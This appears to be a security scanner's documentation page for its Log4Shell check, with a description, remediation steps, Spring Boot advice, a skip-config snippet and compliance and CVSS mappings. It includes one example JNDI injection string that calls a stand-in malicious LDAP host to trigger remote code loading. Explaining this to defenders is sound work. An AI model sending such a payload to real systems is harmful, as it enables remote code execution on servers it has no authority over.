Log4Shell
Description
Log4Shell is a vulnerability that allows attackers to execute arbitrary code by injecting untrusted data into log messages processed by the Log4j library.
Example: logger.error('${jndi:ldap://malicious.com/a}'') could trigger the execution of code from a remote server.
Remediation
To prevent Log4Shell vulnerabilities, take the following actions:
- Update Log4j to the latest version, where this vulnerability is patched.
- Use input validation and sanitization to ensure that user inputs are not directly used in log messages.
- Disable the
jndilookups in Log4j by setting the system propertylog4j2.formatMsgNoLookupstotrue. - Restrict outbound network access from the servers running your applications to prevent JNDI lookups from reaching untrusted servers.
- Implement application-level security controls and monitor for unusual log patterns that may indicate attempted exploits.
REST Specific
Spring_boot
Update Log4j to version 2.15.0 or later to mitigate the Log4Shell vulnerability. Ensure that log messages do not include untrusted data without proper validation and sanitization. Disable jndi lookups by setting the log4j2.formatMsgNoLookups system property to true. Regularly review and monitor logs for suspicious activities.
Configuration
Identifier:
injection/log4shel
Examples
Ignore this check
checks:
injection/log4shel:
skip: true
Score
- Escape Severity: HIGH
Compliance
OWASP: API8:2023
pci: 6.5.10
gdpr: Article-32
soc2: CC6
psd2: Article-97
iso27001: A.14.2
nist: SP800-53
fedramp: SI-10
Classification
- CWE: 829
Score
- CVSS_VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
- CVSS_SCORE: 9.8